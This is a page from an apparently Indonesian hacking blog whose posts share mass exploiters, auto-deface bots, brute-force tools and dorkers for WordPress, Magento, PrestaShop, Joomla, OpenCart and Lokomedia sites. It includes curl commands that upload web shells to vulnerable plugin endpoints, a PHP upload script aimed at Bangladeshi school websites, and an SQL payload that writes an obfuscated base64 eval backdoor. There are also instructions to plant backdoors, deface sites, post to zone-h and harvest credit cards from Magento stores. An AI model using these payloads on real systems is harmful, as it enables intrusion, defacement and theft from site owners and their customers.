Codes Xploit: exploiter
Pages
Showing posts with label exploiter. Show all posts
Showing posts with label exploiter. Show all posts

Realease Tools Pentester Mrcakil v2.1

 
hay guys :v cie berjumpa lagi sama cakil :v
cakil kali ini akan share tools pentester :v kali aja berguna buat kalian
langsung ae guys :v

Realease : kamis.07 Desember
author : Mr.cakil
thanks to : 4wsec - Mr.Tenwap
fiture ?
 01) Red Hawk
 02) D-Tect
 03) Hunner
 04) WPScan
 05) Webdav
 06) Metasploit
 07) Kali Nethunter
 08) Ubuntu
 09) Youtube Dl
 10) viSQL
 11) Weeman
 12) WFDroid
 13) FBBrute
 14) Ngrok
 15) Torshammer
 16) RouterSploit
 17) Hydra
 18) Weevely
 19) SQLMap
 20) Dirbuster
 21) admin finder
 22) lokomedia exploiter
 23) elfinder exploiter
 24) magento add admin exploiter
 25) scanner tools
 26) bing dorker
 27) katoolin
 28) arch linux
 29) linux fedora
 30) hash-buster
 31) sudo
 32) aircrack-ng
 33) joomscan
 34) bing-ip2hosts
 35) BlueMaho
 36) Bluepot
 37) honeypot
 38) bot auto deface 1
 39) bot auto deface 2
 40) mailer sender cli
 41) Wordpress Brute Force
 42) Oh-myzsh theme for termux
 43) instabot (instagram bot)
 44) exit

 berikut tampilan nya
nah gud kan :v
oh iya disitu ada 2 paket ya
tools (itu buat termux)
kalo yang tools2 (all linux) gnuroot ? insya allah

tester : termux/ ubuntu 17.10 / kali linux
langsung ae nih link nya bree
sini bang :v
kritik or saran monggo :)

WordPress Plugin Job Manager File Upload

 
Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

WordPress Business Directory Plugin File Upload

 

Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Prestashop Module Blocktestimonial File Upload

 

[+] Google Dork: inurl:"/modules/blocktestimonial/"
[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php
[+] Tutorial:
- http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html
- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html
[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based )


Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....

Silakan download exploiternya, lalu upload di shell/hosting untuk menjalankannya
Oke Sekian dulu, happy hacking :D
NB: Sumber tertera diatas


Bot Auto Tusbol Hosting Nazuka

 
Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha :D .
Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security. Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya.
Untuk script nya bisa download disini :
Sebelumnya thanks banget buat Mr.MaGnoM, atas referensi bing dorker nya. Big respect bro :)
Oh iya, disini ada beberapa parameter yang harus diubah.
$zh = "zafk1el"; 
Itu nick zone-h. Silahkan diganti sendiri ya.
Lalu bagian 
$isi_nama_doang = 
Yang di encode tersebut script deface . Jadi silahkan diganti dengan cara encode terlebih dahulu script deface kalian ke base64 lalu masukkan kesitu.
Cara pakainya gimana bang ?
Gampang banget. 
Tinggal masukkan perintah
php namafile.php
Lalu enter. Selanjutnya masukkan bing dork nya.
PS : Ini CLI based, bukan web based. Dan juga ini BING dorker, jadi jangan pakai dork google. 
Thanks.

Lokomedia (SQL Injection) + Auto Scan Admin Login + Auto Crack Password

 
Hallo~~ selamat malam, kali ini gua akan share tools lagi buat kalian penyuka exploit sql injection CMS Lokomedia.
Biar ga pusing-pusing, ini tools gua buat supaya lebih mudah aja hehehe

Oke Langsung aja ini dia penampakan tools nya: [ CLI ]


[ Web Based ]



Cara Pake: [CLI]
- Masukan file lokomedia.php dan target.txt nya kedalam 1 folder yang sama.
- format target di dalam file target.txt

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/
- bukalah cmd (install xampp terlebih dahulu jika kalian menggunakan OS Windows).
jalankan command berikut: php lokomedia.php target.txt

Cara Pake: [Web Based]
- upload script ke hosting/shell kalian.
- buka file exploiter tersebut ( web.com/lokomedia.php )
- masukan targetnya

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/


LINK [ CLI ] -> http://pastebin.com/sPpJRjCZ
LINK [ Web Based ] -> http://pastebin.com/0STXanAx

mudah bukan? hehehe.
Oke Sekian dulu, selamat malamm ^^

Magento Bot with Bing Dorker

 
Assalamualaikum, selamat malam gannnn......
Sorry baru ini gua posting lagi di karenakan sekarang udah jarang dpt exploit" fresh wkwkwkk dan bingung juga mau bikin tutor apa. :v

Okee gausah panjang lebar, dalam kesempatan kali ini gua pgn share sebuah tools untuk para Logger yang doyan mainan magento buat cari cc dll :v.

Ini dia penampakan toolsnya:

Tools ini sudah dibuat sedimikian rupa dan pastinya enak dipake :v aman gaada logger karena gua share secara [open source] :).
Dalam tools ini, gua menggabungkan beberapa tools sekaligus + membuatnya semakin mudah dengan memakai Bing Dorker. ( duduk tenang aja gannn, masukin dork -> tunggu mangsa hehehehe :D ).

fitur:
- Magento Add Admin Xploit
=> detect filesystem
=> detect downloader+permission
=> get info average order,lifetime sales,quantity order
=> get info total customers
=> get info installed packages.
- Magento Webforms Xploit

Link-> http://pastebin.com/aGh7w1Ub

*NB: usage: php namafile.php 'bing_dorker'
*NB: php magento.php '"/customer/account/login" site:it'
*NB: $shell = "id.php"; // ganti id.php dengan shell kalian yang berada dalam 1 Folder dengan tools ini *NB: INGET DISINI KITA PAKE DORK BING, BUKAN GOOGLE DORK!!!
dalam tools ini, result target yang berhasil di exploit tidak otomatis tersimpan dalam sebuah file.txt, jadi kalian harus cek 1 1 target kalian yang berhasil di exploit di Terminal/CMD nya langsung. ( maaf gan, ga kepikiran , keburu di publish wkwkw )

Oke sekian duluuu,
Thanks to: Mr. Magnom ( for bing dorker )
Greetz: IndoXploit - Sanjungan Jiwa - Jloyal - Jancok Sec - Res7ock Crew

Full Bot Deface Website

 


Hai semuanya, udah lama banget ngk buat tutor. Gw udh mulai bosen dgn semua ini. Makanya gw pengen share Tools yang menurut gw manteb untuk maen bot - botan..

Cara kerja tools ini ialah dengan mengambil nama domain dari web mirror zone-deface.com, abis itu dapetin ip-nya. nah ipnya kita scan deh di bing. Abis itu kita grab lagi dan kita scan cms apa yg dipakai, terus di save sesuai cmsnya dan di eksploitasi sesuai cms-nya.

Tapi disini gw cuma ada exploit com_media, jce, jdownloads..
untuk yg laen lu cari sendiri ya.

Download Tools disini.
https://drive.google.com/file/d/0B4_2Vn34hkX1V1JYcDFXSlZ2VzQ/view?usp=sharing

command:
php ambil.php attacker_Tu5b0l3d 72 && perl setan.pl ip.htm 31 && php detek.php target_setan.htm && php exploit.php 1-Joomla.htm

catatan:
72 itu ialah page akhir dari attacker_Tu5b0l3d
sesuain sama attacker/team yg mau di grab di http://zone-deface.com/

31 itu page paling akhir pas scan di bing.
klo mau scan sampe 50 page, ubah jadi 51

exploit.php itu isinya ada exploit com_media, jce, jdownloads.
ganti di k.txt dan k.png,
pkoknya harus ada kata - kata hacked.
ganti juga nick di zone-h

1-Joomla.htm itu list joomla site.

Video:
https://www.youtube.com/watch?v=GTocBpZ8eXM

##.
Thx buat bang fyelix yang udah ngasih VPS.

https://www.facebook.com/groups/indoxploitpublic/

Auto Exploiter WebDav PHP

 

Auto Exploiter WebDav thx to @Aderoot

Tool webdav yang terkenal yaitu toolnya hmei7, tapi kali ini ane pengen share tool webdav versi php.

script:
http://pastebin.com/eTmsR6JA

video:
https://www.youtube.com/watch?v=LXmfzEVM0mM

bagi yang belum tau cara menjalankannya.
cek cara menjalankan exploiter php

yuk join!
https://www.facebook.com/groups/indoxploitpublic/

keep share.

PrestaShop Auto Deface by iDx

 
Dalam zip ini, udah ada exploiter,doc root,shell idx.
dan didalam source exploiternyaa, sudah ada penjelasan, file" apa yang boleh diganti dan tidak diganti, selebihnya harap ikutin code yang ada , daripada nantinya error, tanggung sendiri:p

fitur:
- auto tanem backdoor
- auto deface
- hasil nya ke simpen dalam "hasil.txt", taro semuanya dalam 1 folder yang sama ( CLI version ) jalankan lewat cmd/terminal/vps
Cara Pake:
* masukan seluruh target anda ( full url: http://www.target.com/path/path/path/uploadimage.php ) ke dalam sebuah file.txt. * lalu jalankan cmd pada terminal seperti pada gambar diatas.

format target. ( dalam file.txt )
http://www.target1.com/path/path/path/uploadimage.php
http://www.target2.com/path/path/path/uploadimage.php
http://www.target3.com/path/path/path/uploadimage.php
http://www.target4.com/path/path/path/uploadimage.php
http://www.target5.com/path/path/path/uploadimage.php

Download: http://adf.ly/1bWOfF

Okee sekiann duluuuu ^^

Thanks to: Author exploit, sanjungan jiwa

Tool Bruteforce Fleksibel

 


Kali ini gw pengen share tool bruteforce yang menurut gw cukup fleksibel.
mirip kayak hydra kalo ngk salah.

tapi agak ribet, karena banyak parameter yang harus dimasukin.
yaudah langsung aja ini dia toolnya.

script:
http://pastebin.com/9Z5fUhNK

Usage:
php brute.php password.txt "username=admin&password=PASS::fail" url

PASS jangan diganti!

password.txt
password_1<br>password_2<br>password_3

fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login
ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah

url ganti jadi url action loginnya.

tonton videonya biar ngk bingung.
https://youtu.be/zt7XNISMf9g

keep share.
gabung yuk!
group

Mengambil kata menggunakan preg_match

 
Abis baca - baca thread lama gw di http://hacker-newbie.org/showthread.php?tid=20672
jadi terharuu..
ternyata udh 2 tahunan maenan exploiter.
sebelumnya gw ucapin byk2 terima kasih kepada bang sohai yang udah ngebimbing gw sejauh ini, bunglon_ijo yang ikut berjuang bersama - sama, rieqyns13 yang udah mau share scannernya.
dan buat lu semua yang udah mau baca tutor ini yang sebenarnya sih ngk terlalu berguna banget...


*Perhatikan kata demi kata yang tak bermakna ini.
sebelumnya mari baca - baca tentang preg_match dulu disini http://php.net/manual/en/function.preg-match.php

tapi disini ane cuma pengen share cara mengambil kata dengan preg_match.
untuk apasih ?

misalnya kita sedang membuat auto upload.
dan ternyata nama filenya menjadi random.
daripada susah - susah ngecek satu per satu secara manual, mending kita ambil aja nama file random itu dan kemudian cek.

mudah saja, misalnya disaat kita selesai upload, outputnya menjadi seperti ini.
"filename":"420331file.php" "message":"Your file has been uploaded"

oke, alurnya seperti ini.
upload -> dapet ouput -> ambil output

yaudah langsung saja.


setelah sudah mendapatkan nama filenya.
baru deh kita cek lagi menggunakan file_get_content atau curl, kemudian pakai preg_match lagi.
tapi karena ini tutor cuma untuk ngambil namanya aja,
yaudah segini aja.
ya mungkin ngk berarti sama sekali.

Tutorial membuat scanner/finder pada website

Correct me if i wrong.

Upload shell di cms opencart

 
kali ini ane pengen bagiin tutor upload shell di website cms opencart.
work versi 2 keatas..

cari targetnya bisa pake bruteforce disini
http://blog.indoxploit.or.id/2016/06/deface-dengan-opencart-bruteforce-and.html

langsung aja ke videonya ..
https://www.youtube.com/watch?v=CA6BvEopCEo

a.sql

SELECT '<?php eval (gzinflate(base64_decode("bZBNasNADIX3hd5hGLqIoW4OUHvIpoVCIIV0F4KRbY09MD/C1gRC8d3rcWJooaCNvqenJ4RNH4TswDP6rqgHJV8fHzBB6qmKHhxushXJdcDozVP1eTh+Zd9Ls2sCXWf0/rF/O56klueTZEdVssvz81/hBrNkTVvnparGoYfR2GJbqzxX8uU/x5w7oR3xl6+DDmw6aFrqrgpxv1aHwQmH3Ie2pDCyQN/wlbB00bIhGHibRvIWGFRhPEUWi66NRZFSS73ypbvc5DHWzrAw7QwuYCOWkdT6m+kH"))); ?>' FROM `mouwaffek_table`

thx to spyhackerz.com

Deface dengan Opencart Bruteforce and Upload image

 
Kali ini ane pengen share tool bf + upload image di opencart.

referensi:
http://spyhackerz.com/forum/threads/thewayend-opencart-twe-gif-video.1392/

script:
http://pastebin.com/vGRNXUuc

usage:
php Xploit.php target.htm

target.htm
site1.com<br>site2.com<br>site3.com

untuk pengguna windows mungkin bisa install xampp, kemudian taruh script ini di \xampp\php\
dan juga targetnya.
abis itu jalanin pake cmd.

#Keepshare.

Google Dorker New 2016

 
Google Dorker New.




kali ini ane pengen share google dorker yg ngambil dari source hasil curl google.
tapi kyknya kurang joss ini.
dikembangin aja lagi..

ini dia:
http://pastebin.com/9heDxH1K

Video:
https://www.youtube.com/watch?v=Ggv4kkYMEM8


update!!
google dorker with dom.
http://pastebin.com/KccgySw0

video:
https://www.youtube.com/watch?v=A2zpIZvPgtQ



#Keepshare
join yuk.
https://www.facebook.com/groups/indoxploitpublic/

Magento Mass Xploiter

 
yaaa sebelumynyaa exploit ini sudah di publish di web fatoni.id/malangXploit.php dengan buatan / Coded by Syncronyzer.
karena disana masih single exploiter ( masukan 1 1 ) disini gua recoded menjadi Mass Xploiter .
dengan penambahan fitur sedikit berupa:
Cek Filesystem ( ada atau tidak )
Cek Downloader ( ada + bisa login atau tidak dan juga cek permission nya apakah writeable atau tidak)
ini dia penampakannyaaa.


Link:
=> http://tools.indoxploit.or.id/?m=tools&tools=Magento_Add_Admin_Xploit&act=show
=> CLI Version [webforms,add admin] http://pastebin.com/PXkG73pG

WordPress Plugins Tevolution Mass Xploiter

 
Okee gannn, kyknyaa ini exploit lagi booming banget yaaaaa. freshhhh
Thankss buat .
// Res7ock - Aan INCEF buat live targetnyaaaa :D

Ikutin aja kyk di ss gannn.
disini script nyaaaa -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy hackingg ^_^

Auto exploiter com_media.

 
kali ini ane pengen share auto exploiter com_media.
yaudah langsung aja.

script:
http://pastebin.com/v23UTCeu

usage: php xploit.php target.htm

edit $file, preg_match, explode

poto:



*nb: kalo udh muncul yang base64, tapi masih NO. coba manual aja.

keep sharing :)

Deface website sekolah Bangladesh

 
hallo.

kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
POC:

hasil:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)

WordPress U-Design Themes Mass Xploiter

 
Lansunggg aja gannn sedott sourcenyaaaa:
http://pastebin.com/t8PvtP0h


Cara Pake nyaa:
1. Masukin Toolsnya Ke Shell Backdoor / Hosting
2. Masukin Targetnya kyk di SS gan

Ini Google Dorker WP U-Design nya gan biar ga cape cari 1 1:

http://pastebin.com/YFBhSsT6

Salam IndoXploit

Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.